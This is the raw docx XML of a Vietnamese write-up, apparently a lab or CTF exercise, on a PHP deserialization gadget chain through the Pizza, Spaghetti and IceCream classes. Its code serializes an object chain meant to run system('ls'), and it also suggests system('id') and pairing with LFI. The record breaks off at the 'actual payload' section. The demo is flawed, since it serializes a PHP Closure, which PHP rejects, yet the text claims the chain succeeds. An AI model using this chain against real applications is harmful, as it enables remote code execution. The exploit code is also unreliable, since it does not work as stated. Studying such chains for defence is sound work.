            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E9561D" w14:textId="01F53E60" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t>public function __destruct(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C995C4B" w14:textId="77777777" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t xml:space="preserve">    echo $this-&gt;size-&gt;what;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62768734" w14:textId="77777777" w:rsidR="00B649E9" w:rsidRPr="00B649E9" w:rsidRDefault="00B649E9" w:rsidP="00B649E9">
            <w:r w:rsidRPr="00B649E9">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07F6E492" w14:textId="366B5797" w:rsidR="00977918" w:rsidRPr="00977918" w:rsidRDefault="00977918" w:rsidP="00977918">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00977918">
        <w:t>Khi đối tượng bị hủy (cuối script hoặc unset), __destruct() sẽ được gọi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB6FEF" w14:textId="77777777" w:rsidR="00977918" w:rsidRPr="00977918" w:rsidRDefault="00977918" w:rsidP="00977918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00977918">
        <w:t>Nếu $size là một đối tượng có thuộc tính what, thì echo $this-&gt;size-&gt;what sẽ được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1F4D2" w14:textId="5654C432" w:rsidR="00977918" w:rsidRPr="00977918" w:rsidRDefault="00977918" w:rsidP="00977918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00977918">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="00977918">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khai thác:</w:t>
      </w:r>
      <w:r w:rsidRPr="00977918">
        <w:t xml:space="preserve"> Gán $size là một đối tượng có thuộc tính what chứa payload, ví dụ: "</w:t>
      </w:r>
      <w:r w:rsidR="00A75E2F">
        <w:t>system(‘id’)</w:t>
      </w:r>
      <w:r w:rsidRPr="00977918">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF8AFC" w14:textId="08F71DF5" w:rsidR="00947875" w:rsidRDefault="00540C8F" w:rsidP="00033063">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBFC3B" w14:textId="141869EE" w:rsidR="00977918" w:rsidRDefault="00977918" w:rsidP="00977918">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Class </w:t>
      </w:r>
      <w:r w:rsidR="001D4DD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IceCream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C0C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D21A71" w14:textId="0B44E88B" w:rsidR="00CC6588" w:rsidRDefault="00540C8F" w:rsidP="00033063">
      <w:r w:rsidRPr="00CC6588">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7166E006" wp14:editId="540015BE">
            <wp:extent cx="5731510" cy="1772920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6406304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30476" name="Picture 1" descr="A computer screen shot of a black screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1772920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E773EB" w14:textId="77777777" w:rsidR="00A75E2F" w:rsidRPr="00A75E2F" w:rsidRDefault="00A75E2F" w:rsidP="00A75E2F">
      <w:r w:rsidRPr="00A75E2F">
        <w:t>Cấu trúc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4856C088" w14:textId="77777777" w:rsidR="00A75E2F" w:rsidRPr="00A75E2F" w:rsidRDefault="00A75E2F" w:rsidP="00A75E2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75E2F">
        <w:t>Có 2 thuộc tính: $flavors, $topping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43250A28" w14:textId="77777777" w:rsidR="00A75E2F" w:rsidRPr="00A75E2F" w:rsidRDefault="00A75E2F" w:rsidP="00A75E2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75E2F">
        <w:t>Định nghĩa magic method __invoke()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0377D2" w14:textId="4B8DF393" w:rsidR="00A75E2F" w:rsidRPr="00A75E2F" w:rsidRDefault="00A75E2F" w:rsidP="00A75E2F">
      <w:r w:rsidRPr="00A75E2F">
        <w:t xml:space="preserve">Điểm khai </w:t>
      </w:r>
      <w:r w:rsidR="00540C8F">
        <w:t>thác:</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540C8F" w:rsidRPr="00540C8F" w14:paraId="305225F2" w14:textId="77777777" w:rsidTr="00540C8F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED1BAE8" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EFC5270" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F36BC7" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557A8A02" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="590D4AF6" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E01B035" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D1D039" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>public function __invoke()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792DF4FE" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731CAFC1" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t xml:space="preserve">    foreach ($this-&gt;flavors as $flavor) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8F6624" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t xml:space="preserve">        echo $flavor;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4E43A0" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B853515" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRPr="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00540C8F">
            <w:r w:rsidRPr="00540C8F">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BC9353B" w14:textId="77777777" w:rsidR="00947875" w:rsidRDefault="00947875" w:rsidP="00033063"/>
    <w:p w14:paraId="4570A43F" w14:textId="1C1D65EF" w:rsidR="009E37C3" w:rsidRPr="009E37C3" w:rsidRDefault="009E37C3" w:rsidP="009E37C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E37C3">
        <w:t>__invoke() được gọi khi đối tượng bị gọi như một hàm: $iceCream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59D7C3" w14:textId="77777777" w:rsidR="009E37C3" w:rsidRPr="009E37C3" w:rsidRDefault="009E37C3" w:rsidP="009E37C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E37C3">
        <w:t>Nếu $flavors chứa các chuỗi độc hại, chúng sẽ được in ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB70345" w14:textId="77777777" w:rsidR="009E37C3" w:rsidRPr="009E37C3" w:rsidRDefault="009E37C3" w:rsidP="009E37C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009E37C3">
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="009E37C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khai thác:</w:t>
      </w:r>
      <w:r w:rsidRPr="009E37C3">
        <w:t xml:space="preserve"> Gán $flavors = [''] để in payload, hoặc kết hợp với LFI để thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B9330" w14:textId="77777777" w:rsidR="00540C8F" w:rsidRDefault="00540C8F" w:rsidP="00033063"/>
    <w:p w14:paraId="1A05E0FE" w14:textId="77777777" w:rsidR="00644552" w:rsidRPr="00644552" w:rsidRDefault="00644552" w:rsidP="00292D91">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ý tưởng khai thác từ ba class đã cho:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E932ED6" w14:textId="12A483A3" w:rsidR="00644552" w:rsidRPr="00644552" w:rsidRDefault="00644552" w:rsidP="00292D91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve">Đầu tiên, </w:t>
      </w:r>
      <w:r w:rsidR="0010724B">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve"> tạo đối tượng $IceCream với hàm __invoke(), cho phép đối tượng này được gọi như một hàm. </w:t>
      </w:r>
      <w:r w:rsidR="0010724B">
        <w:t>Mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve"> gán thuộc tính flavors là một hàm Closure có chức năng thực thi system('ls').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78CC96" w14:textId="6D62E3EB" w:rsidR="00644552" w:rsidRPr="00644552" w:rsidRDefault="00644552" w:rsidP="00292D91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve">Tiếp theo, </w:t>
      </w:r>
      <w:r w:rsidR="0010724B">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve"> tạo đối tượng $Spaghetti </w:t>
      </w:r>
      <w:r w:rsidR="00292D91">
        <w:t>vì</w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve"> class này có hàm __get(), sẽ được gọi khi truy cập một thuộc tính không tồn tại. Trong hàm này, thuộc tính sauce sẽ được gọi như một hàm, vì vậy </w:t>
      </w:r>
      <w:r w:rsidR="00292D91">
        <w:t xml:space="preserve">mình </w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t>gán $Spaghetti-&gt;sauce bằng hàm Closure đã định nghĩa trong $IceCream-&gt;flavors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D98A5" w14:textId="08515E27" w:rsidR="00644552" w:rsidRPr="00644552" w:rsidRDefault="00644552" w:rsidP="00292D91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve">Cuối cùng, </w:t>
      </w:r>
      <w:r w:rsidR="00F27409">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00644552">
        <w:t xml:space="preserve"> tạo đối tượng $Pizza và gán $Pizza-&gt;size = $Spaghetti. Khi đối tượng $Pizza bị hủy, hàm __destruct() sẽ được gọi, trong đó có dòng echo $this-&gt;size-&gt;what. Vì thuộc tính what không tồn tại trong $Spaghetti, PHP sẽ tự động gọi __get(), từ đó thực thi $this-&gt;sauce() — chính là hàm system('ls').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5B90D" w14:textId="77777777" w:rsidR="00644552" w:rsidRPr="00644552" w:rsidRDefault="00644552" w:rsidP="00292D91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00644552">
        <w:lastRenderedPageBreak/>
        <w:t>→ Kết quả: đoạn mã được thực thi thành công thông qua chuỗi gọi gián tiếp giữa các class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53262688" w14:textId="3A87231D" w:rsidR="002A76C6" w:rsidRDefault="00F27409" w:rsidP="00033063">
      <w:r>
        <w:t xml:space="preserve">Dưới </w:t>
      </w:r>
      <w:r w:rsidR="004C708D">
        <w:t>đây</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là đoạn code </w:t>
      </w:r>
      <w:r w:rsidR="00D6480F">
        <w:t xml:space="preserve">minh họa </w:t>
      </w:r>
      <w:r>
        <w:t>thể hiện điều đó:</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320"/>
        <w:gridCol w:w="8894"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF5132" w:rsidRPr="00BF5132" w14:paraId="7F027625" w14:textId="77777777" w:rsidTr="00BF5132">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDE86F2" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5132">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12EBADC9" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7676B083" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425E9025" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CCAD57" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0722AA8A" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F531FE" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="748BD083" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CB195E" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3498F4A7" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEE8BC6" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C75145A" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="129AB06B" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536EA5AD" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E3C37D" w14:textId="2FFE133D" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8849" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01CF3F4C" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$IceCream = new  IceCream (); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BBF285" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132"/>
          <w:p w14:paraId="73539CBA" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$IceCream -&gt;flavors= function ( ) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B0762F" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">    system ( "ls" ); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B2C5E9" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">}; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EACE43B" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132"/>
          <w:p w14:paraId="19BC6249" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$Spaghetti = new  Spaghetti (); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B133C7F" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$Spaghetti -&gt;sauce = $IceCream -&gt;flavors; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C04B3E5" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132"/>
          <w:p w14:paraId="3B76376D" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$Pizza = new  Pizza (); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41392544" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$Pizza -&gt;size = $Spaghetti ; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48578548" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132"/>
          <w:p w14:paraId="60A1045B" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t xml:space="preserve">$serialize = serialize ( $Pizza ); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C30F1CD" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132"/>
          <w:p w14:paraId="1CB8F7AD" w14:textId="77777777" w:rsidR="00BF5132" w:rsidRPr="00BF5132" w:rsidRDefault="00BF5132" w:rsidP="00BF5132">
            <w:r w:rsidRPr="00BF5132">
              <w:t>echo  $serialize ;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B937910" w14:textId="7AF26A85" w:rsidR="00CC6588" w:rsidRDefault="00CC6588" w:rsidP="00033063"/>
    <w:p w14:paraId="1B14FA1C" w14:textId="3AA71214" w:rsidR="00BB5837" w:rsidRDefault="00BB5837" w:rsidP="00033063">
      <w:r>
        <w:t>Khởi tạo payload thực tế:</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320"/>
        <w:gridCol w:w="8894"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w14:paraId="03B75C0B" w14:textId="77777777" w:rsidTr="006E1E7E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78062DF0" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="201D53FD" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202BD7DF" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D053A03" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8F612D" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038FDE42" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414E3476" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703F6C54" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2BCE12" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478D769C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>10</w:t>
